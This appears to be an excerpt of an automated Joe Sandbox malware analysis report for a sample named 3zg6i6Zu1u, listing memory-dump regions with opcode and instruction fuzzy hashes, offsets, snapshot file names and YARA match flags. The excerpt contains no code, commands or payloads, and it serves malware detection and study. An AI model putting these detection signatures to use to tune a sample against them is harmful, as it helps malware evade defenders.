• Instruction ID: bca40312d9828f1e9db31b2dae59d3f07c01690887fd588e16edcd0bf8627fd7
• Opcode Fuzzy Hash: 2fba3cff2e712456624dfaec6a58e9274202b5be26e54dad0cca218db8944b39
• Instruction Fuzzy Hash: EF5105B1A0C3919FE7218B29C8A077BBFD1AFE7600F18989EE5C587341D7368905CB52
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: x^T:
• API String ID: 0-4046853431
• Opcode ID: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
• Instruction ID: 89561afeee3bb8202773f312476c0e81b73573d3d24e9526409a401e0603a0db
• Opcode Fuzzy Hash: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
• Instruction Fuzzy Hash: 5C5128B46083A19BD321DB29D4A077BBBD1AFE7304F58885EE8C687341D6394905CB56
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: DBCD
• API String ID: 0-3972649111
• Opcode ID: 1da4b6897d511e356b1ebc23eec36a16c5eae396d3714c4eee6a91f3ccd77571
• Instruction ID: 1042aa6a34f86fc71127e435c7ce4cada2dc7c237918be096d0062c3a21733c6
• Opcode Fuzzy Hash: 1da4b6897d511e356b1ebc23eec36a16c5eae396d3714c4eee6a91f3ccd77571
• Instruction Fuzzy Hash: CD512B366182218FD7249B28C821BAFB7D3FBC5718F59453ED989D7282D7359802CB85
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID: DBCD
• API String ID: 2994545307-3972649111
• Opcode ID: 91d37935f36f46556a6b50f0f3136ee6619ea6db3f6409a747e5bbc80fb58e1a
• Instruction ID: 244c48801a6beffa120859c347b683f921f31d654a72ffce60c91e75d6a5c392
• Opcode Fuzzy Hash: 91d37935f36f46556a6b50f0f3136ee6619ea6db3f6409a747e5bbc80fb58e1a
• Instruction Fuzzy Hash: 9D513C366182118FD7248B28CC11BEBB7D2FBC5714F19453DC9D9D3292DB359842CB89
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: <=
• API String ID: 0-1782720273
• Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction ID: 87a174ff6a29080b9b9f81a1d6c0cff6f0616dad54929603c1f4ab930b266dfb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C35159B6E513684BDB14CFB9C8813DEBA32EB89314F0982A9C844B7744E73489458FC1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: <=
                                                                                                                                                                                                                                                          • API String ID: 0-1782720273
                                                                                                                                                                                                                                                          • Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction ID: c36e57fc54e8ebb91c1d5de0612bd1b6b956f574d134e83768c4160145cd7853
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A5139B6E513684BDB14CFB9D8812DEBA32FB89310F0982A9D844B7344E7348D458FC5
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                          • Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction ID: 0939e4d40fc5d93fcb56570d6291fee90fbaea70999a75f9262ea3a47a939cbe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51CF3261C3908BD725AB7885413EFBBE5ABD6310F094E2FD8E987382D6748546CB43
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                          • Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction ID: b490a7b8e69dba0a299ff7ef51fd341b042986cf65b0f910d3ddf594bd78af48
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF51CF3260C3908BD7259B3984912EFBBE5ABC6310F194E3EE4D9973C2D6388542D787
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ul
                                                                                                                                                                                                                                                          • API String ID: 0-4068291676
                                                                                                                                                                                                                                                          • Opcode ID: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
                                                                                                                                                                                                                                                          • Instruction ID: 162c06210579af30b91d2e802b6b39d5a7fb57fbd88dc5fca12273f2b30ca4e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66316032B086501BC70CDA2888A257BB7E29BDE319F19D13ED895C73D2D538DD068744
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 67278b35a64899c4e843d92a3e23c7a93933160186b17761f2465089cb72818a
                                                                                                                                                                                                                                                          • Instruction ID: 019a791d1c25a3c8fe739a31e0a23d423276483b2d618abf22edf044f3024c22
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67278b35a64899c4e843d92a3e23c7a93933160186b17761f2465089cb72818a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF3102722083008FC314DF58D8D166BB7F5FB99318F19483DE69987360E335A918CB66
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 00826e0d4f886e63537347e67f3b42d852862df1b35b6d533ae3730f77ba7a75
                                                                                                                                                                                                                                                          • Instruction ID: c497bc3c17aefed4a2b0ec07c899be2d1253584fb416e3315b0134f03c6467ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00826e0d4f886e63537347e67f3b42d852862df1b35b6d533ae3730f77ba7a75
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A3102721083009FC314DF58D8C166BB7F5FB8A314F19982DEA85873A1D339A918CB6A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
                                                                                                                                                                                                                                                          • Instruction ID: 3029a9d5e0e7f722953d515f50b156050abe03212a902a226f49a86632ee3869
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0352D1B0A08B948FE730DB24C4843A7BBE1EB51314F15893ED5EB167C2C37DA995871A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction ID: f08c22ab1c0d1fa66100344de1db34f38f2f3f082863626706ae7b1aaaa03b8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E012C2326087118BD725DF18D8806FBF3E2FFC8309F59892ED9A697281D734A951CB81
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction ID: f7c506ca0572c78bb64cf85289b63f361dc8afc3a54a3446179c7f90162a8508
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E212A532A0C7118BD724DF18D8816ABB3E2FFD4305F19893ED586A7381D678B855CB86
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4c6e8c4cfc57ff4dd668914b015e59c9e00e9233b7d568ebfdd56b07a4595ae4
                                                                                                                                                                                                                                                          • Instruction ID: d5c9cfdcf59a479f8582786c7c7adb0cf332721f6b17ad9ad40c71f6ea9bcb86
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c6e8c4cfc57ff4dd668914b015e59c9e00e9233b7d568ebfdd56b07a4595ae4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E144766582118BD768AB14C89177EB797FBC8318F2B813EC9D95B392CB349C02CB41
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c010ba06f4a2554f3df4df2cde2feda57d3bfdacdbd77413d54ee2c2c530f914
                                                                                                                                                                                                                                                          • Instruction ID: 64991d460ee72a37471e9b1e47276165ca760ef4d574b4d53f7c3dcd67405996
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c010ba06f4a2554f3df4df2cde2feda57d3bfdacdbd77413d54ee2c2c530f914
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE3212B0514B118FC378CF29C6905AABBF2BF55610B504A6ED6A78BF90D736F885CB10
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
                                                                                                                                                                                                                                                          • Instruction ID: d7bcbc88bdf6cfba9bdc99fa284d67c403e95a1d0c78040340162460b82664a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0322470A14B118FC338CF29C680526BBF5BF45711B604A2ED6A7A7B90D73AF945CB18
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6b9700dbcc9c7b5fddfcdc10bddd65a6860bd28b41b17442a73d505d9a665f44
                                                                                                                                                                                                                                                          • Instruction ID: f12793610bbdd7df445e71ad725eee01dcd733fca3fc50ed4606764463040185
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b9700dbcc9c7b5fddfcdc10bddd65a6860bd28b41b17442a73d505d9a665f44
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5E146726053509BC324DF24C89066BF7E2EBE4354F19892EE9C957354E731EC45CB92
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 91dfba725ab612e4a0151f1bce4eba722cf76487c1c758c9ac25c36a092774d0
• Instruction ID: 3ebb04d120b9a7b4f1ad73d687debb6db223a5719ecffe96ce511131f4aded75
• Opcode Fuzzy Hash: 91dfba725ab612e4a0151f1bce4eba722cf76487c1c758c9ac25c36a092774d0
• Instruction Fuzzy Hash: 2AE136726183115BC324DF24C98162BF7E2EBC8314F2A952EF9C867351DB35AC058BD6
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
• Instruction ID: 2c296d26aef7906563e32756952e4a4c7ef694f083ad3fe01506ea804c24d3ea
• Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
• Instruction Fuzzy Hash: 66E1F1719287228BC7209F24C4906BFB7F1FF95B64F199A1EE8C51B360E7749841CB86
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
• Instruction ID: 7aed7d034054570e623b21814fe3e88dbdb9baf50802d39517b861f70b912fd3
• Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
• Instruction Fuzzy Hash: 29E104719583228BC7208F25C4A06ABF7F1FF95754F198A1EE8C51B360E3789C81C79A
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21973073f6d4a0b3311894adcca56d162d87d3c82ed911ab51d4b26430630d86
• Instruction ID: 3f4607f348259b91e3f3bb69225e26a46c3ad6fe886f003ab5616493c8c42938
• Opcode Fuzzy Hash: 21973073f6d4a0b3311894adcca56d162d87d3c82ed911ab51d4b26430630d86
• Instruction Fuzzy Hash: 80D123B9618200DFE7059F24E842BBBB3A1EB8B714F14582DE5C563291D739EC52CB4A
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7609df40421f803ba74e4e5a7f61a16ac610af0e456a686df4bc1424b9eb9416
• Instruction ID: 894013b4cddf8280fe9985f448069e1978e98a105e8524c3297e15ac4f8d6e0b
• Opcode Fuzzy Hash: 7609df40421f803ba74e4e5a7f61a16ac610af0e456a686df4bc1424b9eb9416
• Instruction Fuzzy Hash: BFB14772A143106BDB24DF24CC52A7BB7E5EF81314F09892EEC8697390E774E905C796
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1ef1897c54fa2071ecb99d8e80b6651a11f677e69ba45229124588226b3d5fa7
• Instruction ID: fd0ad14f469fd7f8be4ec2729ff1ee3d9cd27f1a0c200aa357c7ec80b511e9d1
• Opcode Fuzzy Hash: 1ef1897c54fa2071ecb99d8e80b6651a11f677e69ba45229124588226b3d5fa7
• Instruction Fuzzy Hash: A4F1BE356087418FC724CF29C8806ABFBE6EFD9304F48982EE4E587751E675D849CB52
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
• Instruction ID: af7042075d954c2f255990e0047815087897ea865b94a08f0ee2ad65f5f0e8bc
• Opcode Fuzzy Hash: d3ea000337597ed49648caa6c3f898df650eaa935422a56c09eec78adaff2b55
• Instruction Fuzzy Hash: 05F1E3356087418FD724CF29C88162BFBE6EFD9304F08882EE4D587791E679E904CB96
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28b04a55b0afd722243c8f4111b4868ccd864ddd78f9a9094ddf5f314c0f2cc6
• Instruction ID: 6f7f31ad8a6b10912bb0baa835875978572c61c087cf2b26e32738d5cd4898f8
• Opcode Fuzzy Hash: 28b04a55b0afd722243c8f4111b4868ccd864ddd78f9a9094ddf5f314c0f2cc6
• Instruction Fuzzy Hash: 5DB107B2A04311ABDB24DF24C891B67B7A1FF84318F04856DED899B380E7B5D945CB92
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
• Instruction ID: b5892ab382dddcfdfd1d94d0be47f02d5ea24576abd0edcd507820bf7b56d976
• Opcode Fuzzy Hash: 9964d39c61cd3b2794fe14b554bc3cd6bb6de5af44e00a735a8d134af0461122
• Instruction Fuzzy Hash: 78B11A72A08321ABD714DF24D891767B3E1FFC4318F14852DE9899B381E7B8E905C79A
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dd365453ab748e0273ff5c586676980c7c3044cd1325da56744782b8c68ce235
                                                                                                                                                                                                                                                          • Instruction ID: 75246f9fc7785efa00bbdf74621ec02289069e4376f976c9b418a17e482e7f7b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd365453ab748e0273ff5c586676980c7c3044cd1325da56744782b8c68ce235
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAC12A32E046508FD724CB7CC8613AEFBE25BD9224F19836ED8A6A73D1D6358941C791
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b17a9a249dee50189471622261e6c85febc1b408976e8f514adcc3ecb881b65a
                                                                                                                                                                                                                                                          • Instruction ID: ab94a08ca612d5dfd4bd3df7c5e39867b98a80ff9f43c0af925e9de2b6a39bca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b17a9a249dee50189471622261e6c85febc1b408976e8f514adcc3ecb881b65a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96B1EF71A15201EFD711AF24CC40B1BBBE2BFD9314F148A2EF898A76A0D772DC549B46
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
